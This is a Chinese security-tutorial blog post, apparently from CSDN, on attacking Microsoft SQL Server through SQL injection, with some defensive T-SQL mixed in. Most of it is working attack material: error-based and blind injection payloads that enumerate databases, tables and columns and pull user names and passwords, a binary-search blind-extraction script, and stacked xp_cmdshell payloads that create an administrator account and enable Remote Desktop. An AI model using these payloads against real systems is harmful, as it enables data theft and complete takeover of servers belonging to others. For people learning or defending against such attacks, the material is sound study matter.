Tutorial study notes (1): 08, MSSQL database vulnerabilities

You never know: the person who loved you madly and sent you long messages, who then suddenly went quiet and stopped bothering you, went through a certain kind of pain in their heart...

1. MSSQL introduction

MSSQL (Microsoft SQL Server) is a commercial database with good performance, ease of use, good vendor support and a large set of high-precision data types. Schools, government, online office systems, games, chess and card sites and similar organisations often run it.

Port: 1433

Suffix: .mdf / .ldf

sa (sysadmin) permissions: database operations, file management, command execution, registry reads; roughly the Windows SYSTEM account. Strictly, commands launched through xp_cmdshell run as the SQL Server service account, which may be SYSTEM but can also be a lower-privileged account.

db_owner permissions: file management and database operations; roughly a Windows Administrators member.

public permissions: database operations only; roughly the Windows Guest account.

2. SQL Server 2005

(1) After a successful installation, log in with the account and password.

(2) master, model, msdb and tempdb are the four system databases that ship with the server.

(3) Right-click "Databases", choose "New Database"; SQL Server automatically generates two files for it (the .mdf data file and the .ldf log file).

(4) Double-click to expand the new database, right-click "Tables", add a table, enter the column names and data types, and save.

(5) Right-click the new table and choose "Open Table"; now you can add your data.

(6) To delete a database, right-click the database you want to delete, choose "Tasks", then "Detach"; afterwards delete the database files from the data directory.

(7) To add an external database, first copy the database files into the data directory, then right-click "Databases" and choose "Attach".

(8) To back up a database, right-click the database, choose "Generate Scripts", and pick the server version the script is written for (change the version to suit your own use).

(9) To restore a database, copy the SQL statements from the exported script and run them; this rebuilds the database with the same contents as the backup.
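The same nine GUI steps as a single T-SQL batch, added here as an example (it is not code from the original post). The file paths under C:\lab\ and the database, table and row contents are assumptions for the example; run it in Management Studio or sqlcmd as a sysadmin on a lab instance.

```sql
-- Added example: the GUI walkthrough above, done in T-SQL. Paths and names are assumed.

-- (3) create a database; SQL Server creates the .mdf data file and the .ldf log file
CREATE DATABASE database1
    ON PRIMARY (NAME = database1_data, FILENAME = 'C:\lab\database1.mdf')
    LOG ON     (NAME = database1_log,  FILENAME = 'C:\lab\database1.ldf');
GO
USE database1;
GO
-- (4) add a table with column names and data types
CREATE TABLE dbo.users (
    id    int IDENTITY(1,1) PRIMARY KEY,
    uname nvarchar(50) NOT NULL,
    upass nvarchar(50) NOT NULL
);
-- (5) add rows (constructed sample data)
INSERT INTO dbo.users (uname, upass) VALUES (N'admin', N'Passw0rd!');
INSERT INTO dbo.users (uname, upass) VALUES (N'guest', N'guest');
-- (2) the four system databases ship with every instance; user databases have dbid > 4
SELECT dbid, name FROM master..sysdatabases ORDER BY dbid;
GO
-- (6) detach: the database disappears from the instance, but the .mdf/.ldf stay on disk
--     and can now be deleted or moved
USE master;
GO
EXEC sp_detach_db 'database1';
GO
-- (7) attach an external database from its files
CREATE DATABASE database1
    ON (FILENAME = 'C:\lab\database1.mdf'), (FILENAME = 'C:\lab\database1.ldf')
    FOR ATTACH;
GO
-- (8)/(9) a native backup and restore does what "Generate Scripts" plus re-running the
--         script does, and carries the data as well as the schema
BACKUP DATABASE database1 TO DISK = 'C:\lab\database1.bak' WITH INIT;
GO
RESTORE DATABASE database1 FROM DISK = 'C:\lab\database1.bak' WITH REPLACE;
GO
```

The detach/attach pair is also how an attacker with file access moves a stolen .mdf onto their own instance, which is why the .mdf/.ldf directory deserves the same file permissions as the database itself.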

3. Connecting from code (classic ASP)

<%
' Open an ADO connection to the local SQL Server as sa ("provier" and "source" in the original were typos)
cctt = "Provider=SQLOLEDB;Data Source=(local);User ID=sa;Password=**;Initial Catalog=database1"
Set conn = Server.CreateObject("ADODB.Connection")
conn.Open cctt
%>

The provider is written exactly as shown; the data source can be an IP address (here I use the local machine); sa is the built-in administrative login, whose password you set during installation; the last field is the name of the database to connect to. Note that connecting the web application as sa is exactly what turns every injection point in the application into sysadmin access, including the xp_cmdshell attacks in sections 5 and 6; a production application should connect with a login that has only the rights it needs.
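A least-privilege alternative to connecting as sa, added here as an example that is not part of the original post. It creates a dedicated login, grants it only read access plus writes on one table, and then uses the same privilege-fingerprinting functions the injection section relies on to confirm what an attacker would get. The login name webapp, the password, and the dbo.users table are assumptions.

```sql
-- Added example: a dedicated low-privilege login for the ASP page instead of sa.
-- Names (webapp, database1, dbo.users) and the password are assumed for the example.
USE master;
GO
CREATE LOGIN webapp WITH PASSWORD = 'Use-a-long-random-secret-here!', CHECK_POLICY = ON;
GO
USE database1;
GO
CREATE USER webapp FOR LOGIN webapp;
-- SQL Server 2005-compatible role grant (ALTER ROLE ... ADD MEMBER needs 2012 or later)
EXEC sp_addrolemember 'db_datareader', 'webapp';
GRANT INSERT, UPDATE ON dbo.users TO webapp;
GO
-- Verify from the new login's point of view with the same functions an injection
-- would use to fingerprint privileges: both columns must come back 0.
EXECUTE AS LOGIN = 'webapp';
SELECT IS_SRVROLEMEMBER('sysadmin') AS is_sysadmin,
       IS_MEMBER('db_owner')        AS is_db_owner;
-- Uncomment to confirm command execution is gone; it fails with
-- "The EXECUTE permission was denied on the object 'xp_cmdshell'":
-- EXEC master..xp_cmdshell 'whoami';
REVERT;
GO
-- The ASP connection string then becomes
--   Provider=SQLOLEDB;Data Source=(local);User ID=webapp;Password=...;Initial Catalog=database1
```

With this login the boolean and error-based probes in section 4 still work against database1 (read access is read access), but the privilege checks return 0, HAS_DBACCESS('master') only succeeds through the guest user, and the stacked xp_cmdshell payloads are denied.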

4. Detecting injection

and 1=1 returns the normal page

and 1=2 returns an error or a different page, which means the parameter is injectable

and user>0 raises a conversion error on SQL Server (user is an nvarchar such as 'dbo' and cannot be converted to int); the error text leaks the current user name and confirms the backend is SQL Server

and (select count(*) from sysobjects)>0 returns the normal page on MSSQL (Access has no sysobjects table), which also confirms SQL Server

Guess table names

and (select count(*) from [table_name])>0

Guess column names

and (select count(column_name) from [table_name])>0

Guess the length of a column value

and (select top 1 len(column_name) from table_name)>0

Guess the ASC value of a character (Access)

and (select top 1 asc(mid(column_name,1,1)) from table_name)>0

Guess the Unicode value of a character (MSSQL)

and (select top 1 unicode(substring(column_name,1,1)) from table_name)>0

Replace >0 with >N and bisect on N to recover each character; move the second argument of substring/mid along to recover the next one.

Testing the privilege level (MSSQL)

and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- is the login a system administrator?

and 1=(select IS_SRVROLEMEMBER('serveradmin'));--

and 1=(select IS_SRVROLEMEMBER('setupadmin'));--

and 1=(select IS_SRVROLEMEMBER('securityadmin'));--

and 1=(select IS_SRVROLEMEMBER('diskadmin'));--

and 1=(select IS_SRVROLEMEMBER('bulkadmin'));--

and 1=(select IS_MEMBER('db_owner'));-- database-owner rights; db_owner is a database role, so use IS_MEMBER (IS_SRVROLEMEMBER returns NULL for it)

and 1=(select IS_MEMBER('public'));-- public rights

and 1=convert(int,db_name()) or and 1=(select db_name()) -- the conversion error discloses the current database name

and 1=(select @@servername) -- the conversion error discloses the server name

and 1=(select HAS_DBACCESS('master')) -- can the login open the master database?

Get the version

id=1 and 1=(select @@version)

id=@@version

Get the database name

id=1 and 1=(select db_name())

id=db_name()

Get all databases

id=1 and 1=(select name from master..sysdatabases for xml path) -- all names are concatenated into one string and shown in the conversion error

Get the first user database

id=1 and 1=(select top 1 name from master..sysdatabases where dbid>4) -- dbids 1 to 4 are master, tempdb, model and msdb, so user databases start at 5

Get the next database

id=1 and 1=(select top 1 name from master..sysdatabases where dbid>4 and name <>'database found above')

or

id=1 and 1=(select top 1 name from master..sysdatabases where dbid>5) -- and so on

Get all tables

id=1 and 1=(select name from sysobjects for xml path)

Get the first table

id=1 and 1=(select top 1 name from sysobjects where xtype='u')

Get the next table

id=1 and 1=(select top 1 name from sysobjects where xtype='u' and name <>'table found above')

Get the first column name (uname) of the table users

id=1 and 1=(select top 1 name from syscolumns where id=(select id from sysobjects where name='users'))

Get the second column name (upass) of the table users

id=1 and 1=(select top 1 name from syscolumns where id=(select id from sysobjects where name='users') and name <> 'uname')

Continue the same way for the remaining columns.

Get the first user name from the table users

?id=1 and 1=(select top 1 uname from users)

Get the password

?id=1 and 1=(select top 1 upass from users)

All of the 1=(select ...) forms are error-based: SQL Server tries to convert the selected string to int, fails, and prints the string in the error message. If the application hides error messages, fall back to the boolean unicode(substring()) probe above.
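When errors are suppressed, the unicode(substring()) probe above has to be driven character by character. The batch below, added here as an example (not code from the original post), runs that probe as a binary search so that each character costs about 16 yes/no answers instead of up to 65535, and recovers the complete name of the first user table. In a real injection each IF would be one HTTP request whose response (normal page or not) is the answer; here it is executed directly against the catalog of a lab instance. The ORDER BY is an addition to make top 1 deterministic across requests.

```sql
-- Added example: binary search over the page's unicode(substring()) probe to read the
-- first user table name without relying on error messages. Lab use only.
DECLARE @pos int, @lo int, @hi int, @mid int, @tbl nvarchar(128);
SET @pos = 1;
SET @tbl = N'';
WHILE @pos <= 128
BEGIN
    SET @lo = 0;
    SET @hi = 65535;   -- sysobjects.name is nvarchar: UNICODE() returns a UTF-16 code unit, not a byte
    WHILE @lo < @hi
    BEGIN
        SET @mid = (@lo + @hi) / 2;
        -- the same subquery the text injects; ORDER BY keeps "top 1" stable between probes
        IF (SELECT TOP 1 UNICODE(SUBSTRING(name, @pos, 1))
            FROM sysobjects WHERE xtype = 'U' ORDER BY name) > @mid
        BEGIN
            SET @lo = @mid + 1;   -- "page returned normally": the character is above @mid
        END
        ELSE
        BEGIN
            SET @hi = @mid;       -- "page differed" (or NULL past the end of the name)
        END
    END
    -- past the end of the name SUBSTRING returns '' and UNICODE('') is NULL, so every
    -- comparison is false and the search converges on 0: treat that as the terminator
    IF @lo = 0 BREAK;
    SET @tbl = @tbl + NCHAR(@lo);
    SET @pos = @pos + 1;
END
SELECT @tbl AS first_user_table;   -- e.g. 'users' when that is the first user table by name
```

To enumerate the remaining tables, add `and name <> '<previous result>'` to the subquery's WHERE clause, exactly as the "get the next table" step does, and rerun the outer loop. The same loop works for database names (master..sysdatabases, dbid>4), column names (syscolumns) and row values (uname, upass), since only the subquery changes.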

5. Adding a user with xp_cmdshell

id=1 ;exec master..xp_cmdshell 'net user username password /add'

id=1 ;exec master..xp_cmdshell 'net localgroup administrators username /add' -- add the new user to the administrators group

These are stacked queries: they only work if the application's driver executes more than one statement per request and the login is a sysadmin. On SQL Server 2005 and later xp_cmdshell is disabled by default and has to be enabled with sp_configure first.

6. Enabling port 3389 (Remote Desktop)

id=1 ;exec master..xp_cmdshell 'sc config termservice start= auto' -- sc.exe requires the space after start=

;exec master..xp_cmdshell 'net start termservice'

;exec master..xp_cmdshell 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f'
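Sections 5 and 6 as one T-SQL batch, added here as an example that is not from the original post. It shows the sp_configure step that a sysadmin-level injection has to stack in front of the xp_cmdshell calls on SQL Server 2005 and later, the page's commands with the sc.exe and reg.exe syntax corrected, and then the check and reversal a defender runs. The username and password are the page's own placeholders; run this only on a lab machine you own.

```sql
-- Added example: enable, use, audit and disable xp_cmdshell. Lab use only.

-- 1. what an attacker with sa/sysadmin stacks before the xp_cmdshell calls
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
-- commands run as the SQL Server service account, so check who that is first
EXEC master..xp_cmdshell 'whoami';
-- section 5: add a user and put it in the local administrators group
EXEC master..xp_cmdshell 'net user username password /add';
EXEC master..xp_cmdshell 'net localgroup administrators username /add';
-- section 6: start Terminal Services and allow RDP connections
--   sc.exe needs the space in "start= auto"; reg.exe needs /v and /d separated from their values
EXEC master..xp_cmdshell 'sc config termservice start= auto';
EXEC master..xp_cmdshell 'net start termservice';
EXEC master..xp_cmdshell 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f';

-- 2. what a defender checks and reverts
SELECT name, value_in_use
FROM sys.configurations
WHERE name IN ('xp_cmdshell', 'show advanced options', 'Ole Automation Procedures');
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;
-- Every RECONFIGURE writes "Configuration option 'xp_cmdshell' changed from 0 to 1"
-- to the SQL Server error log, which is the detection signal for this whole chain.
```

Because the page's payloads are injected through a web parameter, each EXEC line above corresponds to one request of the form `id=1;exec ...`; the sp_configure lines have to be sent the same way before the xp_cmdshell lines will run.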

Do not use this for anything illegal; you do so at your own risk.

Welcome to follow the WeChat public account: web security tool library

Source: blog.csdn.net/weixin_41489908/article/details/104400736